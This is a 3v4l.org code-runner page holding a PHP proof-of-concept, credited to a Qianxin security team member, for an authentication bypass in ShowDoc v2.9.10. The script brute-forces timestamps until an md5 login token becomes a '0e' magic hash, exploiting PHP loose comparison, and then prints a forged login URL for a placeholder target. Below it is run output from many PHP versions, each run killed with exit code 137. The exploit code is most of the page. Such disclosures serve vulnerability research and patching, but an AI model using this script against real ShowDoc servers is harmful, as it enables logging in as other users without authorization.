3v4l.org

run code in 300+ PHP versions simultaneously
<?php // Credit:Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) // Date:2021/10/13 /* ShowDoc v2.9.10 Auth Bypass PoC #2: 1) PHP Type Juggling (弱类型), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf 2) Using that: ('0e111' == '0e222') => (bool)true 3) This script use Brute-Forcing to find a possible collision */ $username = 's' ; // Forged username $time = 1694131871 ; //2023-09-08 08:11:11, always valid timestamp $login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; //a possible bin2hex( random_bytes( 16 ) ); $total = 1000000; for ($i=0; $i<(1000*$total); $i++){// try to Find solution in 1 Billion numbers! $time += 1; $token = md5($username.$login_secret_key.$time); if (substr($token, 0, 2) === "0e"){ if(preg_match('/^[0]+e[0-9]+$/', $token)) //0e123, 00e123, ... { echo "time:$time, while final is: $token".PHP_EOL; } } if (($i % $total) == 0){ echo "[".($i/$total)."‰]".PHP_EOL; } } echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target ?>
Output for 8.1.26, 8.3.0
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰] [9‰]
Process exited with code 137.
Output for 8.1.25, 8.2.13
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰] [9‰] [10‰]
Process exited with code 137.
Output for 8.2.12
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰]
Process exited with code 137.
Output for 8.0.30, 8.1.23, 8.2.11
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰]
Process exited with code 137.
Output for 7.3.0 - 7.3.22, 7.3.24 - 7.3.33, 7.4.0 - 7.4.25, 7.4.27 - 7.4.33, 8.0.0 - 8.0.29, 8.1.0, 8.1.2 - 8.1.22, 8.1.24, 8.2.0 - 8.2.10
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰]
Process exited with code 137.
Output for 7.3.23, 7.4.26, 8.1.1
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰]
Process exited with code 137.
preferences:
76.93 ms | 402 KiB | 143 Q